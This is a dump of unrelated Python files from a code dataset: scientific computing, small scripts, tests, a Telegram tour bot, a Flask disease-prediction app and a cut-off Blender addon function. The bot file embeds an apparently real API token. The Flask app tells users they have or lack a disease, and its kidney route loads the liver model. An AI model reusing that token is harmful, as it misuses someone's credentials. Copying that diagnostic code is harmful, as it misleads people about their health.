\n self.lnunit = lnunit\n\n kernel = lnunit.get_spatiotemporal_kernel(movie.row_range, movie.col_range, movie.t_range, reverse=True, threshold=threshold)\n\n kernel.apply_threshold(threshold)\n \n super(LNUnitCursor, self).__init__(kernel, movie)\n \n def __call__(self, t):\n return self.lnunit.transfer_function(super(LNUnitCursor, self).__call__(t))\n \nclass MultiLNUnitCursor(object):\n \n def __init__(self, multi_lnunit, movie, threshold=0):\n\n self.multi_lnunit = multi_lnunit\n self.lnunit_cursor_list = [LNUnitCursor(lnunit, movie, threshold=threshold) for lnunit in multi_lnunit.lnunit_list]\n self.movie = movie\n \n def evaluate(self, **kwargs):\n\n# print len(self.lnunit_cursor_list)\n# for ii, x in enumerate(self.lnunit_cursor_list):\n# \n# print ii, self.multi_lnunit, self.multi_lnunit.transfer_function, x\n# print ii, x.evaluate(**kwargs), kwargs\n# print 'done'\n# # print lnunit, movie, curr_cursor\n\n\n\n multi_e = [unit_cursor.evaluate(**kwargs) for unit_cursor in self.lnunit_cursor_list]\n t_list, y_list = zip(*multi_e)\n \n# plt.figure()\n# plt.plot(t_list[0],y_list[0])\n# plt.plot(t_list[0],y_list[1],'r')\n# plt.show()\n \n #sys.exit()\n\n# print len(y_list)\n\n return t_list[0], self.multi_lnunit.transfer_function(*y_list)\n \nclass MultiLNUnitMultiMovieCursor(MultiLNUnitCursor):\n \n def __init__(self, multi_lnunit, movie_list, threshold=0.):\n\n assert len(multi_lnunit.lnunit_list) == len(movie_list)\n \n self.multi_lnunit = multi_lnunit\n self.lnunit_movie_list = movie_list\n self.lnunit_cursor_list = [lnunit.get_cursor(movie, threshold=threshold) for lnunit, movie in zip(multi_lnunit.lnunit_list, movie_list)]\n# for lnunit, movie, curr_cursor in zip(multi_lnunit.lnunit_list, movie_list, self.lnunit_cursor_list):\n# print lnunit, movie, curr_cursor\n\nclass SeparableKernelCursor(object):\n\n def __init__(self, spatial_kernel, temporal_kernel, movie):\n '''Assumes temporal kernel is not reversed'''\n\n self.movie = movie\n self.spatial_kernel = spatial_kernel\n self.temporal_kernel = temporal_kernel\n\n def evaluate(self, threshold=0):\n\n full_spatial_kernel = np.array([self.spatial_kernel.full()])\n full_temporal_kernel =
self.temporal_kernel.full()\n\n nonzero_inds = np.where(np.abs(full_spatial_kernel[0,:,:])>=threshold)\n rm, rM = nonzero_inds[0].min(), nonzero_inds[0].max()\n cm, cM = nonzero_inds[1].min(), nonzero_inds[1].max()\n\n convolution_answer_sep_spatial = (self.movie.data[:,rm:rM+1, cm:cM+1] * full_spatial_kernel[:,rm:rM+1, cm:cM+1]).sum(axis=1).sum(axis=1)\n sig_tmp = np.zeros(len(full_temporal_kernel) + len(convolution_answer_sep_spatial) - 1)\n sig_tmp[len(full_temporal_kernel)-1:] = convolution_answer_sep_spatial\n convolution_answer_sep = spsig.convolve(sig_tmp, full_temporal_kernel[::-1], mode='valid')\n t = np.arange(len(convolution_answer_sep))/self.movie.frame_rate\n return t, convolution_answer_sep\n\n\nclass SeparableSpatioTemporalFilterCursor(SeparableKernelCursor):\n\n def __init__(self, spatiotemporal_filter, movie):\n\n self.spatial_filter = spatiotemporal_filter.spatial_filter\n self.temporal_filter = spatiotemporal_filter.temporal_filter\n\n spatial_kernel = self.spatial_filter.get_kernel(movie.row_range, movie.col_range, threshold=-1)\n temporal_kernel = self.temporal_filter.get_kernel(t_range=movie.t_range, threshold=0, reverse=True)\n spatial_kernel.kernel *= spatiotemporal_filter.amplitude\n\n super(SeparableSpatioTemporalFilterCursor, self).__init__(spatial_kernel,\n temporal_kernel,\n movie)\n\n\nclass SeparableLNUnitCursor(SeparableSpatioTemporalFilterCursor):\n def __init__(self, lnunit, movie):\n self.lnunit = lnunit\n\n super(SeparableLNUnitCursor, self).__init__(self.lnunit.linear_filter, movie)\n\n def evaluate(self, downsample = 1):\n\n assert downsample == 1\n\n t, y = super(SeparableLNUnitCursor, self).evaluate()\n\n return t, [self.lnunit.transfer_function(yi) for yi in y]\n\nclass SeparableMultiLNUnitCursor(object):\n\n def __init__(self, multilnunit, movie):\n\n self.multilnunit = multilnunit\n\n self.lnunit_cursor_list = []\n for lnunit in self.multilnunit.lnunit_list:\n self.lnunit_cursor_list.append(SeparableLNUnitCursor(lnunit, movie))\n\n def evaluate(self, *args, **kwargs):\n\n assert kwargs.get('downsample', 1) == 1\n\n y_list = []\n for cursor in self.lnunit_cursor_list:\n t, y = cursor.evaluate(*args, **kwargs)\n y_list.append(y)\n\n return t, self.multilnunit.transfer_function(*y_list)\n \n# if __name__ == \"__main__\":\n# spatial_filter_1 = GaussianSpatialFilter(sigma=(2.,2.), amplitude=10)\n# temporal_filter = TemporalFilterCosineBump((.4,-.3), (40,80))\n# curr_filter = SpatioTemporalFilter(spatial_filter_1, temporal_filter)\n#\n# movie_file = '/data/mat/iSee_temp_shared/movies/TouchOfEvil.npy'\n# m_data = np.load(movie_file, 'r')\n# movie = Movie(m_data[:,:,:], frame_rate=30.)\n# cursor = FilterCursor(curr_filter, movie, threshold=-1)\n# cursor.evaluate()\n \n ","sub_path":"bmtk/simulator/filternet/lgnmodel/cursor.py","file_name":"cursor.py","file_ext":"py","file_size_in_byte":9527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"505458383","text":"#!/usr/bin/env python3\n\n\nimport sys\n\ndef parse_input(rawtext):\n lines = rawtext.split('\\n')\n plants = lines[0][15:]\n plants = plants.replace('.', '0')\n plants = plants.replace('#', '1')\n plants = tuple(int(val) for val in plants)\n\n cases = dict()\n for line in lines[2:]:\n if line:\n line = line.replace('.', '0')\n line = line.replace('#', '1')\n cases[tuple(int(val) for val in line[:5])] = int(line[9])\n return plants, cases\n\n\ndef plantstep(plants, cases, modifier=0):\n left = []\n if plants[:4] != [0]*4:\n inc = len(plants)//8\n 
left += [0]*inc\n modifier -= inc\n right = []\n if plants[-4:] != [0]*4:\n right = [0]*4\n new_plants = left+list(plants)+right\n plants = tuple(new_plants)\n\n for i in range(plants.index(1)-3, len(plants)-1):\n present = plants[i-2:i+3]\n\n if present in cases:\n new_plants[i] = cases[present]\n else:\n new_plants[i] = 0\n return new_plants, modifier\n\n\ndef potsum(plants, modifier):\n sum_pots = 0\n for i in range(len(plants)):\n if plants[i]:\n sum_pots += i+modifier\n return sum_pots\n\n\ndef plants_to_str(plants):\n txt = ''.join([str(val) for val in plants])\n txt = txt.replace('0', '.')\n txt = txt.replace('1', '#')\n return txt\n\n\ndef test_plantstep():\n rawtext = '''initial state: #..#.#..##......###...###\n\n...## => #\n..#.. => #\n.#... => #\n.#.#. => #\n.#.## => #\n.##.. => #\n.#### => #\n#.#.# => #\n#.### => #\n##.#. => #\n##.## => #\n###.. => #\n###.# => #\n####. => #'''\n\n plants, cases = parse_input(rawtext)\n\n assert plants_to_str(plants) == '#..#.#..##......###...###'\n plants, modifier = plantstep(plants, cases)\n assert plants_to_str(plants).strip('.') == '#...#....#.....#..#..#..#'\n for i in range(19):\n plants, modifier = plantstep(plants, cases, modifier)\n assert plants_to_str(plants).strip('.') == '#....##....#####...#######....#.#..##'\n\n assert potsum(plants, modifier) == 325\n\n\ndef main():\n rawtext = open(sys.argv[1]).read()\n plants, cases = parse_input(rawtext)\n modifier = 0\n # observation: increase seems to stabilise after a while\n diff = 0\n oldsum = 0\n for i in range(20000):\n plants, modifier = plantstep(plants, cases, modifier)\n newsum = potsum(plants, modifier)\n if newsum-oldsum == diff:\n print(newsum+diff*(50000000000-i-1))\n break\n diff = newsum-oldsum\n oldsum = newsum\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"12_plants2.py","file_name":"12_plants2.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"180252814","text":"import unittest\nimport HTMLTestRunner\nfrom Mj_API import front_api\nfrom Mj_API import web_api_1\ninfo = {}\n\n\nclass Mj_web_api(unittest.TestCase):\n\n def setUp(self):\n print('Starting execution')\n\n def test_web_login(self):\n '''Web login API'''\n r = web_api_1.Web_api_common()\n r = r.web_login().status_code\n self.assertEqual(r, 200)\n\n def tearDown(self):\n print('Finished')\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Mj_API/run_case.py","file_name":"run_case.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"189180340","text":"######################################################################################\n# Roberts advection test for IMEX sdc in Paralpha with just an explicit part and Euler\n# no spatial variables here, just time\n######################################################################################\n\nimport numpy as np\n\n\n# Paralpha settings\nN = int(1e03) # spatial points\ndt = 1e-03\nTend = 1e-02\nL = int(Tend / dt)\n\nalpha = 1e-01\nK = 5 # maxiter\n\n# equation settings\nT1 = 0\nT2 = L * dt + T1\nX1 = 0\nX2 = 1\nc = 1\nx = np.linspace(X1, X2, N + 2)[1:-1]\ndx = x[1] - x[0]\nt = np.linspace(T1, T2, L + 1)[1:]\n\nprint(f'CFL: {c*dt/dx}')\n\nprint('solving on [{}, {}] x [{}, {}]'.format(T1, T2, X1, X2))\n\n# functions\nA = 1 / (1 * dx) * (-np.eye(k=-1, N=N) + np.eye(k=0, N=N))\nA[0, -1] = -1 / (1 * dx)\n# A = 1/(2 * dx) * (-np.eye(k=-1, N=N) + np.eye(k=1, N=N))\n# A[0, -1] =
-1/(2 * dx)\n# A[-1, 0] = 1/(2 * dx)\n\n\ndef u_exact(t, x):\n return np.sin(2 * np.pi * (x - c * t))\n\n\ndef f_exp(t, x, u):\n y = -c * A @ u\n return y\n\n\n# the rest\nu0 = u_exact(T1, x)\n\n# explicit euler\nus = u0.copy()\nfor l in range(L):\n us = us + dt * f_exp(t[l] - dt, x, us)\n\nerr_euler = np.linalg.norm((us - u_exact(T2, x)).flatten(), np.inf)\nprint('seq err = ', err_euler)\n\nEa = np.eye(k=-1, N=L) # + alpha * np.eye(k=-1, N=L)\nEa[0, -1] = alpha\n\nprint(sum([np.linalg.matrix_power(Ea, l) for l in range(10)]))\n\nprint(np.linalg.norm(np.linalg.inv(Ea), np.inf))\nexit()\n\nprint(np.linalg.norm(np.eye(k=-1, N=L) + Ea, np.inf))\n\n\nu = np.zeros(N * L, dtype=complex)\n\n# for l in range(L):\n# u[l * N: (l + 1) * N] = u0\n\nu[:N] = u0\n\nrhs = np.empty(N * L, dtype=complex)\n\nd, S = np.linalg.eig(Ea)\nSinv = np.linalg.inv(S) # S @ d @ Sinv = Ea\n\nprint(f'Diagonalization error: {np.linalg.norm(S @ np.diag(d) @ Sinv - Ea, np.inf)}')\n# exit()\nerr = np.linalg.norm(u[-N:] - u_exact(T2, x), np.inf)\nprint(err, 0)\n\nfor k in range(K):\n rhs[:N] = u0 - alpha * u[-N:] + dt * f_exp(t[0] - dt, x, u[:N])\n for l in range(1, L, 1):\n rhs[l * N : (l + 1) * N] = dt * f_exp(t[l] - dt, x, u[(l - 1) * N : l * N]) - alpha * u[(l - 1) * N : l * N]\n\n # u = np.kron(Sinv, np.eye(N)) @ rhs\n for i in range(L):\n temp = np.zeros(N, dtype=complex)\n for j in range(L):\n temp += Sinv[i, j] * rhs[j * N : (j + 1) * N]\n u[i * N : (i + 1) * N] = temp.copy()\n\n # solve diagonal systems\n for l in range(L):\n u[l * N : (l + 1) * N] /= 1 + d[l]\n\n # u = np.kron(S, np.eye(N)) @ u\n u1 = u.copy()\n for i in range(L):\n temp = np.zeros(N, dtype=complex)\n for j in range(L):\n temp += S[i, j] * u1[j * N : (j + 1) * N]\n u[i * N : (i + 1) * N] = temp.copy()\n\n err_paralpha = np.linalg.norm((u[-N:] - u_exact(T2, x)).flatten(), np.inf)\n print(err_paralpha, k + 1)\n if err_euler > err_paralpha:\n break\n\n\nerr = np.linalg.norm((us - u[-N:]).flatten(), np.inf)\nprint('error between seq and paralpha = ', err)\n\n# gc. 
collect()\n","sub_path":"pySDC/playgrounds/paralpha/explicit.py","file_name":"explicit.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"586189791","text":"import csv\nimport os\n\n# CSV path\nbudget_data_csv = os.path.join(\"/Users/mackenzieswaney/pybank/\", 'budget_data.csv')\n\n# Total months output/ tracking\ntotal_months = 0\n\n# Create lists\nmonths = []\nnet = []\nchanges = []\n\n# Read CSV\nwith open(budget_data_csv, newline='') as csvfile:\n bankreader = csv.reader(csvfile, delimiter=\",\")\n\n # Read header row\n csv_header = next(csvfile)\n\n# Loop through CSV - count months & total rev\n for row in bankreader:\n total_months = total_months + 1\n net.append(int(row[1]))\n prev = total_months - 1\n change = int(row[1]) - net[(prev-1)]\n changes.append(change)\n months.append(str(row[0]))\n \n# Define variables\ntotal = sum(net)\naverage_change = round(sum(changes)/(len(changes)-1), 2)\nmax_val = max(changes)\nmin_val = min(changes)\nmax_ind = changes.index(max_val)\nmin_ind = changes.index(min_val)\nmax_month = months[max_ind]\nmin_month = months[min_ind]\n\n# Print to terminal\nprint(\"Financial Analysis\")\nprint(\"-------------------------\")\nprint(f'Total Months: {total_months}')\nprint(f'Total: ${total}')\nprint(f'Average Change: ${average_change}')\nprint(f'Greatest Increase in Profits: {max_month} (${max_val})')\nprint(f'Greatest Decrease in Profits: {min_month} (${min_val})')\n\n# Print to txt file\ntextfile = open(\"pybankmackenzie.txt\", \"w\")\n\ntextfile.write(\"Financial Analysis\\n\")\ntextfile.write(\"-------------------------\\n\")\ntextfile.write(f'Total Months: {total_months}\\n')\ntextfile.write(f'Total: ${total}\\n')\ntextfile.write(f'Average Change: ${average_change}\\n')\ntextfile.write(f'Greatest Increase in Profits: {max_month} (${max_val})\\n')\ntextfile.write(f'Greatest Decrease in Profits: {min_month} (${min_val})')","sub_path":"pbmain.py","file_name":"pbmain.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"615782637","text":"# -*- coding: utf-8 -*-\nimport random\nimport telebot\nbot = telebot.TeleBot('1201165565:AAElTl8352APspMEaZcQhjTQXqDkPdoxq9A')\nfrom telebot import types\nimport dictionaries\n\nspb_way1_text = dictionaries.spb_way1_text\nspb_way1_img = dictionaries.spb_way1_img\nurl = \"https://raw.githubusercontent.com/ChKtn/BySteps/master/\"\nurl_p1 = \"img_way1_saint_peterburg/\"\ni = 0\ng = 0\nroute_len = 12\nspb_way2_text = dictionaries.spb_way2_text\nspb_way2_img = dictionaries.spb_way2_img\nroute_len = dictionaries.spb_way2_len\nurl_p2 = \"img_way2_saint_peterburg/\"\n\n\n@bot.message_handler(commands=[\"start\"])\ndef start(message):\n bot.send_message(message.from_user.id, \"Hello\") # Prepare the buttons\n # Prepare the text and a handler for each button in turn\n keyboard = types.InlineKeyboardMarkup()\n key_spb = types.InlineKeyboardButton(text='Saint Petersburg', callback_data='spb')\n # And add the button to the screen\n keyboard.add(key_spb)\n key_kazan = types.InlineKeyboardButton(text='Kazan', callback_data='kazan')\n keyboard.add(key_kazan)\n # Show all the buttons at once and send a selection prompt\n bot.send_message(message.from_user.id, text='Choose a city you want to walk around', reply_markup=keyboard)\n\n # Handler for button presses\n@bot.callback_query_handler(func=lambda call: call.data == \"spb\")\ndef
callback_worker_spb(call):\n bot.send_message(call.message.chat.id, \"Saint Petersburg! The cultural capital of Russia)\")\n keyboard_spb = types.InlineKeyboardMarkup()\n key_spb_w1 = types.InlineKeyboardButton(text='Medium route (~1h)', callback_data='spb_w1')\n keyboard_spb.add(key_spb_w1)\n key_spb_w2 = types.InlineKeyboardButton(text='Themed route \"Pushkin Petersburg\" (~2h)', callback_data='spb_w2')\n keyboard_spb.add(key_spb_w2)\n bot.send_message(call.from_user.id, text='Choose a route', reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"spb_w1\" )\ndef callback_worker_spb_w1(call):\n bot.send_message(call.message.chat.id, \"Medium route\")\n keyboard = types.InlineKeyboardMarkup()\n k_w1 = types.InlineKeyboardButton(text='Here we go!', callback_data=\"next_place1\")\n keyboard.add(k_w1)\n bot.send_photo(call.from_user.id, url+url_p1+spb_way1_img[0], spb_way1_text[0], reply_markup=keyboard)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"spb_w2\")\ndef callback_worker_spb_w2(call):\n bot.send_message(call.message.chat.id, \"Themed route Pushkin Petersburg\")\n keyboard = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Here we go!', callback_data=\"next_place2\")\n keyboard.add(key_w1)\n bot.send_photo(call.from_user.id, url + url_p2 + spb_way2_img[0], spb_way2_text[0], reply_markup=keyboard)\n\n@bot.callback_query_handler(func=lambda call: call.data==\"next_place1\")\ndef next_place1(call):\n global i\n i += 1\n if i == route_len:\n bot.send_photo(call.from_user.id, url + url_p1 + spb_way1_img[i], spb_way1_text[i])\n bot.send_message(call.message.chat.id, \"This is where our journey ends. Come back soon and explore new routes :)\\n\\nTo try other routes, use /start\")\n i = 0\n start(call.message)\n elif i >= route_len:\n i = 0\n start(call.message)\n else:\n keyboard_spb = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Next place', callback_data=\"next_place1\")\n keyboard_spb.add(key_w1)\n key_w2 = types.InlineKeyboardButton(text='Show the map', callback_data=\"spb_w1\")\n keyboard_spb.add(key_w2)\n bot.send_photo(call.from_user.id, url + url_p1 + spb_way1_img[i], spb_way1_text[i], reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data==\"next_place2\")\ndef next_place2(call):\n global g\n g += 1\n if g == route_len:\n bot.send_photo(call.from_user.id, url+ url_p2+ spb_way2_img[g], spb_way2_text[g])\n bot.send_message(call.message.chat.id, \"This is where our journey ends. Come back soon and explore new routes :)\\n\\nTo try other routes, use /start\")\n g=0\n start(call.message)\n elif g >= route_len:\n g = 0\n start(call.message)\n else:\n keyboard_spb = types.InlineKeyboardMarkup()\n key_w1 = types.InlineKeyboardButton(text='Next place', callback_data=\"next_place2\")\n keyboard_spb.add(key_w1)\n key_w2 = types.InlineKeyboardButton(text='Show the map', callback_data=\"spb_w2\")\n keyboard_spb.add(key_w2)\n bot.send_photo(call.from_user.id, url +url_p2+ spb_way2_img[g], spb_way2_text[g], reply_markup=keyboard_spb)\n\n@bot.callback_query_handler(func=lambda call: call.data == \"kazan\")\ndef callback_worker_kazan(call):\n bot.send_message(call.message.chat.id, \"We will add this city soon; for now you can take a walk around another city.
Use /start\")\n\n@bot.message_handler(content_types=['text'])\ndef all_messages(msg):\n start(msg)\nif __name__ == '__main__':\n bot.polling(none_stop=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"122224144","text":"from flask import Flask, render_template, url_for, flash, redirect\nimport joblib\nfrom flask import request\nimport numpy as np\n\napp = Flask(__name__, template_folder='templates')\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/Heart\")\ndef heart():\n return render_template(\"heart.html\")\n\n@app.route(\"/Diabetes\")\ndef diabetes():\n return render_template(\"diabetes.html\")\n\n@app.route(\"/Liver\")\ndef liver():\n return render_template(\"liver.html\")\n\n@app.route(\"/Kidney\")\ndef kidney():\n return render_template(\"kidney.html\")\n\n@app.route(\"/BreastCancer\")\ndef breastCancer():\n return render_template(\"cancer.html\")\n\n\n\ndef ValuePredictorDia(to_predict_list_dia, size):\n to_predictDia = np.array(to_predict_list_dia).reshape(1,size)\n if(size==6):\n loaded_model_dia = joblib.load('diabetes_model.pkl')\n resultDia = loaded_model_dia.predict(to_predictDia)\n return resultDia[0]\n \n\ndef ValuePredictorHeart(to_predict_list_heart, size):\n to_predictHeart = np.array(to_predict_list_heart).reshape(1,size)\n if(size==7):\n loaded_model_heart = joblib.load('heart_model.pkl')\n resultHeart = loaded_model_heart.predict(to_predictHeart)\n return resultHeart[0]\n\n\ndef ValuePredictorLiver(to_predict_list_liver, size):\n to_predictLiver = np.array(to_predict_list_liver).reshape(1,size)\n if(size==7):\n loaded_model_liver = joblib.load('liver_model.pkl')\n resultLiver = loaded_model_liver.predict(to_predictLiver)\n return resultLiver[0]\n\ndef ValuePredictorKidney(to_predict_list_kidney, size):\n to_predictKidney = np.array(to_predict_list_kidney).reshape(1,size)\n if(size==7):\n loaded_model_kidney = joblib.load('liver_model.pkl')\n resultKidney = loaded_model_kidney.predict(to_predictKidney)\n return resultKidney[0]\n\ndef ValuePredictorCancer(to_predict_list_cancer, size):\n to_predictCancer = np.array(to_predict_list_cancer).reshape(1,size)\n if(size==5):\n loaded_model_cancer = joblib.load('cancer_model.pkl')\n resultCancer = loaded_model_cancer.predict(to_predictCancer)\n return resultCancer[0]\n\n\n@app.route('/predictDia', methods = [\"POST\"])\ndef predictDia():\n if request.method == \"POST\":\n to_predict_list_dia = request.form.to_dict()\n to_predict_list_dia = list(to_predict_list_dia.values())\n to_predict_list_dia = list(map(float, to_predict_list_dia))\n # diabetes\n if(len(to_predict_list_dia)==6):\n resultDia = ValuePredictorDia(to_predict_list_dia,6)\n \n if(int(resultDia)==1):\n predictionDia = \"Sorry! You may be at risk of diabetes. Please consult your doctor immediately\"\n else:\n predictionDia = \"Don't worry,
you show no symptoms of diabetes\"\n return(render_template(\"result.html\", prediction_text=predictionDia)) \n\n\n@app.route('/predictHeart', methods = [\"POST\"])\ndef predictHeart():\n if request.method == \"POST\":\n to_predict_list_heart = request.form.to_dict()\n to_predict_list_heart = list(to_predict_list_heart.values())\n to_predict_list_heart = list(map(float, to_predict_list_heart))\n # heart disease\n if(len(to_predict_list_heart)==7):\n resultHeart = ValuePredictorHeart(to_predict_list_heart,7) \n\n if(int(resultHeart)==1):\n predictionHeart = \"Sorry! You may be at risk of heart disease. Please consult your doctor immediately\"\n else:\n predictionHeart = \"Don't worry, you show no symptoms of heart disease\"\n return(render_template(\"result.html\", prediction_text=predictionHeart))\n\n\n@app.route('/predictLiver', methods = [\"POST\"])\ndef predictLiver():\n if request.method == \"POST\":\n to_predict_list_liver = request.form.to_dict()\n to_predict_list_liver = list(to_predict_list_liver.values())\n to_predict_list_liver = list(map(float, to_predict_list_liver))\n # liver infection\n if(len(to_predict_list_liver)==7):\n resultLiver = ValuePredictorLiver(to_predict_list_liver,7) \n\n if(int(resultLiver)==1):\n predictionLiver = \"Sorry! You may be at risk of a liver infection. Please consult your doctor immediately\"\n else:\n predictionLiver = \"Don't worry, you show no symptoms of liver infections\"\n return(render_template(\"result.html\", prediction_text=predictionLiver)) \n\n@app.route('/predictKidney', methods = [\"POST\"])\ndef predictKidney():\n if request.method == \"POST\":\n to_predict_list_kidney = request.form.to_dict()\n to_predict_list_kidney = list(to_predict_list_kidney.values())\n to_predict_list_kidney = list(map(float, to_predict_list_kidney))\n # kidney disease\n if(len(to_predict_list_kidney)==7):\n resultKidney = ValuePredictorKidney(to_predict_list_kidney,7) \n\n if(int(resultKidney)==1):\n predictionKidney = \"Sorry! You may be at risk of kidney disease. Please consult your doctor immediately\"\n else:\n predictionKidney = \"Don't worry, you show no symptoms of kidney disease\"\n return(render_template(\"result.html\", prediction_text=predictionKidney))\n\n@app.route('/predictCancer', methods = [\"POST\"])\ndef predictCancer():\n if request.method == \"POST\":\n to_predict_list_cancer = request.form.to_dict()\n to_predict_list_cancer = list(to_predict_list_cancer.values())\n to_predict_list_cancer = list(map(float, to_predict_list_cancer))\n # breast cancer\n if(len(to_predict_list_cancer)==5):\n resultCancer = ValuePredictorCancer(to_predict_list_cancer,5) \n\n if(int(resultCancer)==1):\n predictionCancer = \"Sorry! You may be at risk of breast cancer. Please consult your doctor immediately\"\n else:\n predictionCancer = \"Don't worry,
you show no symptoms of breast cancer\"\n return(render_template(\"result.html\", prediction_text=predictionCancer)) \n\n\n \n\nif __name__ == \"__main__\":\n app.run(debug=True, port=8000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"102212271","text":"import numpy as np\n\nfrom sklearn.utils.testing import assert_array_equal\nfrom sklearn.cross_decomposition import KernelCCA\n\n\ndef test_kernel_cca():\n # test against matlab implementation by David Hardoon\n X = np.array([[0., 0., 1.], [1., 0., 0.], [2., 2., 2.], [3., 5., 4.]])\n Y = np.array([[0.1, -0.2], [0.9, 1.1], [6.2, 5.9], [11.9, 12.3]])\n kcca = KernelCCA(kernel=\"linear\", n_components=2,\n kapa=0.1, eta=0.1, pgso=True)\n kcca.fit(X, Y)\n matlab_lambdas = np.array([0.9998, 0.7698])\n matlab_alphas = np.array(\n [[-0.0868, 1.3628],\n [ 0.0181, 0.1309],\n [-0.0090, 0.5048],\n [ 0.0281, -0.3625]])\n matlab_betas = np.array(\n [[-0.0207, -3.2597],\n [ 0.0128, 1.9876],\n [-0.0269, -4.4307],\n [ 0.0154, 2.0363]])\n assert_array_equal(matlab_lambdas, np.round(kcca.lambdas_, decimals=4))\n assert_array_equal(matlab_alphas, np.round(kcca.alphas_, decimals=4))\n","sub_path":"sklearn/cross_decomposition/tests/test_kernel_cca.py","file_name":"test_kernel_cca.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"12063943","text":"# coding: utf-8\n\nimport os\nimport unittest\nfrom mock import Mock, patch\n\nfrom core.utils import system_utils\nfrom core.config import setup_config, config\n\n\nclass TestCleanup(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n setup_config('data/config.py')\n\n from flask import Flask\n cls.app = Flask(__name__)\n cls.app.sessions = None\n\n from core import db\n cls.app.database = db.Database(config.DATABASE)\n\n with patch(\n 'core.utils.init.home_dir', Mock(return_value=config.BASEDIR)\n ):\n from vmmaster import cleanup\n cls.cleanup = cleanup\n\n def setUp(self):\n self.ctx = self.app.app_context()\n self.ctx.push()\n\n def tearDown(self):\n self.ctx.pop()\n\n def test_file_deletion(self):\n from core.db.models import Session\n session = Session('some_platform')\n session.status = 'unknown'\n session.name = '__test_file_deletion'\n session.save()\n\n session_dir = os.path.join(\n config.SCREENSHOTS_DIR, str(session.id)\n )\n system_utils.run_command(\n [\"mkdir\", config.SCREENSHOTS_DIR],\n silent=True)\n system_utils.run_command(\n [\"mkdir\", session_dir],\n silent=True)\n system_utils.run_command(\n [\"touch\", os.path.join(session_dir, \"file_for_deletion\")],\n silent=True)\n self.cleanup.delete_session_data([session])\n self.assertEqual(os.path.isdir(session_dir), 0)\n system_utils.run_command(\n [\"rm\", \"-rf\", config.SCREENSHOTS_DIR], silent=True)\n\n def test_sessions_overflow(self):\n user = Mock(id=1, max_stored_sessions=0)\n from core.db.models import Session\n session = Session('some_platform')\n session.status = 'unknown'\n session.closed = True\n session.name = '__test_outdated_sessions'\n session.save()\n\n session_ids_to_delete = [p.id for p in self.cleanup.sessions_overflow(user)]\n\n self.assertIn(session.id, session_ids_to_delete)\n self.cleanup.delete_session_data([session])\n\n def test_session_keep_forever(self):\n user = Mock(id=1, max_stored_sessions=0)\n\n from core.db.models import Session\n session1 =
Session(platform='some_platform', name='__test_keep_forever_sessions_1')\n session1.closed = True\n session1.keep_forever = True\n session1.save()\n\n session2 = Session(platform='some_platform', name='__test_keep_forever_sessions_2')\n session2.closed = True\n session2.keep_forever = False\n session2.save()\n\n session_ids_to_delete = [p.id for p in self.cleanup.sessions_overflow(user)]\n\n self.assertNotIn(session1.id, session_ids_to_delete)\n self.assertIn(session2.id, session_ids_to_delete)\n\n self.cleanup.delete_session_data([session1, session2])\n\n def test_endpoints_cleanup(self):\n \"\"\"\n - endpoint1 linked with session\n - endpoint2 not linked with session\n - both endpoints mark as 'deleted'\n expected: endpoint1 deleted, endpoint2 not deleted\n \"\"\"\n class FakeOrigin(str):\n short_name = 'fake_short_name'\n\n from core.db.models import Session, Endpoint, Provider\n provider = Provider('name', 'url')\n endpoint1 = Endpoint(origin=FakeOrigin('fake'), prefix='prefix', provider=provider)\n endpoint2 = Endpoint(origin=FakeOrigin('fake'), prefix='prefix', provider=provider)\n endpoint1.deleted, endpoint2.deleted = True, True\n endpoint1.save(), endpoint2.save()\n\n session = Session(platform='some_platform', name='__test_keep_forever_sessions_1')\n session.refresh()\n session.endpoint = endpoint1\n session.save()\n\n endpoints_to_delete = [e.id for e in self.cleanup.endpoints_to_delete()]\n self.assertNotIn(endpoint1.id, endpoints_to_delete)\n self.assertIn(endpoint2.id, endpoints_to_delete)\n","sub_path":"tests/integrational/test_cleanup.py","file_name":"test_cleanup.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"223111639","text":"import gpu\nfrom gpu_extras.batch import batch_for_shader\n\nfrom .set_corners import set_corners\nfrom .set_quads import set_quads\n\nfrom ..utils.draw import draw_line\n\ndef draw_crop(self, context):\n active_strip = context.scene.sequence_editor.active_strip\n\n #theme = context.user_preferences.themes['Default']\n #active_color = theme.view_3d.object_active\n\n #active_color = (active_color[0], active_color[1], active_color[2], 1.0)\n active_color = (1.0, 0.5, 0, 1)\n color = (0, 1.0, 1.0, 1.0)\n\n set_corners(self, context)\n set_quads(self, context)\n\n vertices = []\n for corner in self.corners:\n vertices.append([corner[0], corner[1]])\n\n draw_line(vertices[0], vertices[1], 1, color)\n draw_line(vertices[1], vertices[2], 1, color)\n draw_line(vertices[2], vertices[3], 1, color)\n draw_line(vertices[3], vertices[0], 1, color)\n\n for i in range(len(self.corner_quads)):\n quad = self.corner_quads[i]\n\n bl = 